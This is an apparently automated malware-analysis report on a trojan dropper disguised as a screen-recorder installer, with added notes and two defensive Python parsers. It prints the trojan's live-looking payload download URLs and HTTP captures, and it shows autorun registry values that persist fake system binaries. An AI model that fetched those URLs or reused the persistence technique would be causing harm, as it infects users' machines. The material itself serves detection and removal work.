Trojan.Win32.Reconyc.evlt (Kaspersky), Gen:Heur.Bodegun.1 (AdAware), Trojan.NSIS.StartPage.FD (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: ea46ee27e1fbe7bf9d39c136fcdea33b
SHA1: 78527b3aa327fb1277b7ae132d9a1e97327f1764
SHA256: 8b7027c5ee801e063e6af99f0d2d1d352437cb8349d0fa02d0d0c964871dfbb8
SSDeep: 196608:MVBP5t/xcm9ZJiPy/puWpqC8NtYIYW8D8I W5ovz6NGzsTYlZA/D:sxlnRfpq38X z gA
Size: 14517248 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2015-10-02 20:03:56
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):
%original file name%.exe:1752
TempSetup.exe:444
Tempbbflbk4.exe:1908
(The last two are the executables the sample drops into Local Settings, see File activity; the sandbox lists their activity under this heading rather than under process creation.)
Mutexes
The following mutexes were created/opened:
ZonesLockedCacheCounterMutex
ZonesCacheCounterMutex
ZonesCounterMutex
ShimCacheMutex
File activity
The process %original file name%.exe:1752 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Tempbbflbk4.exe (107182 bytes)
%Documents and Settings%\%current user%\Local Settings\TempSetup.exe (230 bytes)
Both files sit directly in Local Settings with a "Temp" prefix rather than inside Local Settings\Temp, which looks like the Temp directory being joined to the file name without a separator; an executable at that location is unusual enough to be worth a hunt query on its own.
The process TempSetup.exe:444 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\system\svchost.exe (11964 bytes)
%WinDir%\system\server.zip (6671 bytes)
%WinDir%\system\taskhost.exe (3172 bytes)
The Trojan deletes the following file(s):
%WinDir%\system\server.zip (0 bytes)
The two executables borrow the names of Windows system binaries but are written to %WinDir%\system (the legacy directory), not %WinDir%\System32 where the genuine files live (taskhost.exe only exists from Windows 7 onward). server.zip is the archive fetched over HTTP (see Network Activity) and is apparently removed once its contents have been extracted.
The process Tempbbflbk4.exe:1908 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\AdvSplash.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\links.ini (286 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\modern-wizard.bmp (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\RemPendingFileOp.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\spltmp.bmp (16424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst2.tmp (1579032 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp (0 bytes)
Registry activity
The process %original file name%.exe:1752 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry (the Cryptography\RNG "Seed", Explorer Shell Folders and MountPoints2 writes are side effects of ordinary Windows API use and are not indicators on their own; the MUICache entries record the names of the dropped executables):
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4B 25 AC 30 77 FD 4A 76 15 97 F6 E4 E4 68 77 FE"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1]
"Tempsetup.exe" = "Axlio"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1]
"Tempbbflbk4.exe" = "Tempbbflbk4"
The process also writes the Internet Explorer security-zone mapping values:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1" (UNC paths are treated as Local Intranet)
"IntranetName" = "1" (local sites not assigned to another zone, i.e. dotless host names, are treated as Local Intranet)
"ProxyBypass" = "1" (sites that bypass the proxy are treated as Local Intranet)
These are the IE defaults (all three Local Intranet options enabled) and are commonly written when a process first initialises the WinINet/urlmon zone settings, so on their own they are weak evidence of tampering.
The process TempSetup.exe:444 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CC 6F 40 B1 3F 39 FB 7D 9E 9F 45 30 20 C6 AD 54"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
To start the dropped binaries at every logon of the current user, TempSetup.exe adds the following values to the HKCU autorun key (the value names imitate an Intel component; the images are the copies in %WinDir%\system, not the genuine System32 files):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Intel(R) Common User Interface" = "C:\Windows\system\svchost.exe"
"Intel(R) Common User Windows" = "C:\Windows\system\taskhost.exe"
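As an added example (not part of the Lavasoft report), the following Python parses a .reg export of the Run key and flags the pattern above: a value whose image path carries the name of a Windows system binary but does not live in System32 or SysWOW64. The sample export is constructed from the two values in this report plus one benign entry; the watch-list of binary names and legitimate directories is an assumption for illustration.

```python
"""Flag Run-key entries that impersonate Windows system binaries.

Added example for this report, not code from Lavasoft. Parses a .reg-style
export of HKCU\\...\\Run and reports values whose image path has the name of a
core Windows binary but does not live in System32/SysWOW64. SAMPLE_REG is
constructed from the two values in this report plus one benign entry.
"""
import re
from pathlib import PureWindowsPath

# Assumed watch-list: names malware commonly borrows, and where the real ones live.
SYSTEM_BINARIES = {"svchost.exe", "taskhost.exe", "taskhostw.exe",
                   "lsass.exe", "csrss.exe", "winlogon.exe"}
LEGIT_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}

# Constructed .reg export (backslashes and quotes escaped the way regedit writes them).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Intel(R) Common User Interface"="C:\\Windows\\system\\svchost.exe"
"Intel(R) Common User Windows"="C:\\Windows\\system\\taskhost.exe"
"OneDrive"="\"C:\\Users\\user\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
'''

KEY_RE = re.compile(r"^\[(?P<key>[^\]]+)\]\s*$")
VALUE_RE = re.compile(r'^"(?P<name>(?:[^"\\]|\\.)*)"=(?P<data>.*)$')


def reg_unescape(s):
    # Undo regedit escaping: a backslash-escaped backslash or quote becomes the bare character.
    return re.sub(r"\\(.)", r"\1", s)


def image_path(command):
    """Return the executable path from a Run command (quoted or bare; arguments dropped)."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    path = []
    for token in command.split(" "):   # bare path: keep tokens up to the first *.exe
        path.append(token)
        if token.lower().endswith(".exe"):
            break
    return " ".join(path)


def scan_run_key(reg_text):
    """Return a list of findings for suspicious values under any ...\\Run key in the export."""
    findings, current_key = [], None
    for line in reg_text.splitlines():
        key_match = KEY_RE.match(line)
        if key_match:
            current_key = key_match.group("key")
            continue
        value_match = VALUE_RE.match(line)
        if not value_match or not (current_key or "").lower().endswith("\\run"):
            continue
        data = value_match.group("data")
        if not (data.startswith('"') and data.endswith('"')):
            continue                               # only REG_SZ data holds a command line
        image = image_path(reg_unescape(data[1:-1]))
        p = PureWindowsPath(image)
        if p.name.lower() in SYSTEM_BINARIES and str(p.parent).lower() not in LEGIT_DIRS:
            findings.append({
                "key": current_key,
                "value": reg_unescape(value_match.group("name")),
                "image": image,
                "reason": f"{p.name} expected in System32, found in {p.parent}",
            })
    return findings


if __name__ == "__main__":
    for f in scan_run_key(SAMPLE_REG):
        print(f"[!] {f['value']!r} -> {f['image']}: {f['reason']}")
```

On a live host the input comes from `reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Run run.reg`; the same parser can be pointed at the HKLM Run and RunOnce keys. Matching on the directory rather than the file name alone is what separates these two entries from the genuine service host.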
The process Tempbbflbk4.exe:1908 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C5 73 92 E8 EF C5 E5 F9 27 5C 31 BB 81 03 62 D2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
Dropped PE files
MD5 | File path |
---|---|
c9f5d0c41112ff0c018c8f3944baf5a2 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\TempSetup.exe |
13cc92f90a299f5b2b2f795d0d2e47dc | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi3.tmp\AdvSplash.dll |
9b3f214936612cb31aee3085f818bb72 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi3.tmp\RemPendingFileOp.dll |
c17103ae9072a06da581dec998343fc1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi3.tmp\System.dll |
7579ade7ae1747a31960a228ce02e666 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi3.tmp\UserInfo.dll |
c10e04dd4ad4277d5adc951bb331c777 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi3.tmp\nsDialogs.dll |
84a536dc4aa2fb1e4c3f222f159d3efe | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Tempbbflbk4.exe |
54ca76d64d0fbf64eefa3fbf73887e2f | c:\WINDOWS\system\svchost.exe |
dc17d30ae1fd630ead4819da1819ccc4 | c:\WINDOWS\system\taskhost.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager): the original sample, TempSetup.exe and Tempbbflbk4.exe, plus any svchost.exe or taskhost.exe whose image path is %WinDir%\system (check the path first; the genuine instances run from %WinDir%\System32 and must not be killed).
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Tempbbflbk4.exe (107182 bytes)
%Documents and Settings%\%current user%\Local Settings\TempSetup.exe (230 bytes)
%WinDir%\system\svchost.exe (11964 bytes)
%WinDir%\system\server.zip (6671 bytes)
%WinDir%\system\taskhost.exe (3172 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\AdvSplash.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\links.ini (286 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\modern-wizard.bmp (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\RemPendingFileOp.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\spltmp.bmp (16424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst2.tmp (1579032 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Intel(R) Common User Interface" = "C:\Windows\system\svchost.exe"
"Intel(R) Common User Windows" = "C:\Windows\system\taskhost.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: Blueberry
Product Name: BB FlashBack Pro 4
Product Version: 4.1.9.3121
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 4.1.9.3121
File Description:
Comments:
Language: Language Neutral
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 8192 | 14509028 | 14509056 | 5.54197 | d2c2bf6da3ad0d8988279f5138ddf34f |
.sdata | 14524416 | 312 | 512 | 1.39815 | 077dbbcfff33679972bcd7d68127604f |
.rsrc | 14532608 | 5714 | 6144 | 3.92205 | bc7ff4cb126dd668e0bb174c688bde70 |
.reloc | 14540800 | 12 | 512 | 0.070639 | 26d09530a29582b5b0c45401afd333b8 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://customtshirtsandhoodies.org/koxoa/meomu.txt | 184.154.45.211 |
hxxp://songbienkhoipharma.com/images/advers/images/meomu.zip | 125.212.220.231 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
Two requests were captured: the text file meomu.txt on customtshirtsandhoodies.org, whose 60-byte body is nothing but the URL of meomu.zip on songbienkhoipharma.com, and the ZIP itself, whose first entry is named svchost.exe. This is consistent with server.zip being written to %WinDir%\system, svchost.exe being dropped beside it and the archive then deleted (see File activity).
GET /images/advers/images/meomu.zip HTTP/1.1
Host: songbienkhoipharma.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 29 Oct 2015 02:56:49 GMT
Server: Apache/2
Last-Modified: Wed, 30 Sep 2015 14:55:48 GMT
ETag: "286f9a-c396-520f8203b30e2"
Accept-Ranges: bytes
Content-Length: 50070
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: application/zip
PK.. [ZIP local file header; first entry name: svchost.exe; binary body omitted]
<<< skipped >>>
GET /koxoa/meomu.txt HTTP/1.1
Host: customtshirtsandhoodies.org
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 29 Oct 2015 03:06:32 GMT
Last-Modified: Wed, 30 Sep 2015 15:06:23 GMT
ETag: "3c26d2-3c-520f8461eeb4f"
Content-Length: 60
Vary: User-Agent
Content-Type: text/plain
X-Varnish: 326474024
Age: 0
X-Cache: MISS
Connection: keep-alive
Accept-Ranges: bytes
hXXp://songbienkhoipharma.com/images/advers/images/meomu.zip
(the 60-byte response body is exactly this URL)
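As an added example, not from the report, the following Python reproduces the two-stage chain offline: it validates the stage-one body (the 60-byte text captured above) as a single URL, then walks ZIP local file headers from the start of the blob to recover entry names and check for an MZ header, which is how the `PK..svchost.exe` prefix in the dump is read even from a truncated capture. The ZIP is constructed in memory with zipfile as a stand-in for meomu.zip, so nothing touches the network.

```python
"""Offline parsing of the two-stage fetch seen in this report.

Added example, not part of the Lavasoft report. Stage one is a tiny text file
whose body is the URL of stage two; stage two is a ZIP whose first local file
header names svchost.exe. STAGE1_BODY is the 60-byte response captured in the
report; the ZIP is built here with zipfile so the code runs without network.
"""
import io
import struct
import zipfile
import zlib
from urllib.parse import urlsplit

LOCAL_HEADER = struct.Struct("<IHHHHHIIIHH")   # PK\x03\x04 local file header, 30 bytes
LOCAL_SIG = 0x04034B50
STORED, DEFLATED = 0, 8

# Captured stage-one body from the report (Content-Length: 60).
STAGE1_BODY = b"http://songbienkhoipharma.com/images/advers/images/meomu.zip"


def build_sample_zip():
    """Constructed stand-in for meomu.zip: a fake PE named svchost.exe plus a text file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("svchost.exe", b"MZ" + b"\x90" * 62 + b"PE\x00\x00",
                    compress_type=zipfile.ZIP_DEFLATED)
        zf.writestr("readme.txt", b"not a program\n", compress_type=zipfile.ZIP_STORED)
    return buf.getvalue()


def parse_stage_one(body):
    """Return the single http(s) URL carried by the stage-one text, or None."""
    try:
        text = body.decode("ascii").strip()
    except UnicodeDecodeError:
        return None
    if not text or any(c.isspace() for c in text):
        return None                    # expect exactly one token
    parts = urlsplit(text)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return None
    return text


def list_zip_entries(data):
    """Walk local file headers from offset 0 (works on a truncated capture)."""
    entries, pos = [], 0
    while pos + LOCAL_HEADER.size <= len(data):
        (sig, _ver, flags, method, _t, _d, _crc,
         csize, usize, nlen, xlen) = LOCAL_HEADER.unpack_from(data, pos)
        if sig != LOCAL_SIG:
            break                      # central directory or garbage: stop
        name = data[pos + 30: pos + 30 + nlen].decode("cp437")
        start = pos + 30 + nlen + xlen
        entries.append({"name": name, "method": method, "csize": csize,
                        "usize": usize, "offset": start})
        if flags & 0x08:               # sizes live in a trailing data descriptor; cannot skip
            break
        pos = start + csize
    return entries


def entry_prefix(data, entry, n=2):
    """First n bytes of the entry's uncompressed content, or b"" if the capture is truncated."""
    raw = data[entry["offset"]: entry["offset"] + entry["csize"]]
    if len(raw) < entry["csize"]:
        return b""
    if entry["method"] == STORED:
        return raw[:n]
    if entry["method"] == DEFLATED:
        return zlib.decompress(raw, -15)[:n]   # raw deflate stream, no zlib header
    return b""


def analyse_chain(stage1_body, zip_bytes):
    """Tie both stages together: payload URL, entry names, and which entries look like PEs."""
    entries = list_zip_entries(zip_bytes)
    pe_entries = [e["name"] for e in entries
                  if entry_prefix(zip_bytes, e) == b"MZ" or e["name"].lower().endswith(".exe")]
    return {"payload_url": parse_stage_one(stage1_body),
            "entries": [e["name"] for e in entries],
            "pe_entries": pe_entries}


if __name__ == "__main__":
    print(analyse_chain(STAGE1_BODY, build_sample_zip()))
```

Walking local headers instead of the central directory is deliberate: a sandbox PCAP or proxy log often holds only the first few kilobytes of the download, and the local header at offset 0 already tells you the entry name and compression method.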
Map
The Trojan connects to the servers at the following location(s) (the geolocation map is not reproduced; the IPs are those in the URL table above).
Strings from Dumps
These are the strings of a standard NSIS 2.46 installer and its plugins (nsDialogs, System, UserInfo, AdvSplash, RemPendingFileOp): Tempbbflbk4.exe is the BB FlashBack Pro 4 installer named in the version information, the visible side of the Trojan, while TempSetup.exe (MUICache name "Axlio") is the component that drops the %WinDir%\system binaries and sets the Run keys.
Tempbbflbk4.exe_1908:
.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
GetAsyncKeyState
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
logging set to %d
settings logging to %d
created uninstaller: %d, "%s"
WriteReg: error creating key "%s\%s"
WriteReg: error writing into "%s\%s" "%s"
WriteRegBin: "%s\%s" "%s"="%s"
WriteRegDWORD: "%s\%s" "%s"="0xx"
WriteRegExpandStr: "%s\%s" "%s"="%s"
WriteRegStr: "%s\%s" "%s"="%s"
DeleteRegKey: "%s\%s"
DeleteRegValue: "%s\%s" "%s"
WriteINIStr: wrote [%s] %s=%s in %s
CopyFiles "%s"->"%s"
CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
Error registering DLL: Could not load %s
Error registering DLL: %s not found in %s
Exec: failed createprocess ("%s")
Exec: success ("%s")
Exec: command="%s"
ExecShell: success ("%s": file:"%s" params:"%s")
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
Exch: stack
RMDir: "%s"
MessageBox: %d,"%s"
Delete: "%s"
File: wrote %d to "%s"
File: skipped: "%s" (overwriteflag=%d)
File: error creating "%s"
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"
Rename failed: %s
Rename on reboot: %s
Rename: %s
IfFileExists: file "%s" does not exist, jumping %d
IfFileExists: file "%s" exists, jumping %d
CreateDirectory: "%s" created
CreateDirectory: can't create "%s" - a file already exists
CreateDirectory: can't create "%s" (err=%d)
CreateDirectory: "%s" (%d)
SetFileAttributes: "%s":X
Sleep(%d)
detailprint: %s
Call: %d
Aborting: "%s"
Jump: %d
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
install.log
%u.%u%s%s
Skipping section: "%s"
Section: "%s"
New install of "%s" to "%s"
RegDeleteKeyExA
RMDir: RemoveDirectory failed("%s")
RMDir: RemoveDirectory on Reboot("%s")
RMDir: RemoveDirectory("%s")
RMDir: RemoveDirectory invalid input("%s")
Delete: DeleteFile failed("%s")
Delete: DeleteFile on Reboot("%s")
Delete: DeleteFile("%s")
%s=%s
*?|/":
invalid registry key
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
x%c
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi3.tmp\nsDialogs.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi3.tmp\nsDialogs.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi3.tmp
mscoree.dll
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
.mixcrt
KERNEL32.DLL
operator
kernel32.dll
GetProcessWindowStation
USER32.DLL
PendingFileRenameOperations
c:\dev\PCWinCam\BCB6-new\RemPendingFileOp\Output\RemPendingFileOp.pdb
GetProcessHeap
GetCPInfo
RemPendingFileOp.dll
:*:5:9:>:
.reloc
UserInfo.dll
System.dll
callback%d
ZE[.LVF.
%o.MA
nsi3.tmp
File: skipped: "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi3.tmp\nsDialogs.dll" (overwriteflag=1)
p\nsDialogs.dll"
\"%CurrentUserName%"\LOCALS~1\Temp\nsi3.tmp
DOCUME~1\"%CurrentUserName%"\LOCALS~1\Tempbbflbk4.exe"
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Tempbbflbk4.exe"
%Program Files%\Blueberry Software\BB FlashBack Pro 4
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1
Tempbbflbk4.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Tempbbflbk4.exe
889848471
1245492
1245446
1359282841
638190238
456789:0
Nullsoft Install System v2.46
VVV.bbconsult.co.uk
Remove File Pending Operations
1, 0, 0, 1
00000000
CompanyWebsite
hXXp://VVV.bbflashback.com/
4.1.9.3121
Tempbbflbk4.exe_1908_rwx_011C4000_00001000:
callback%d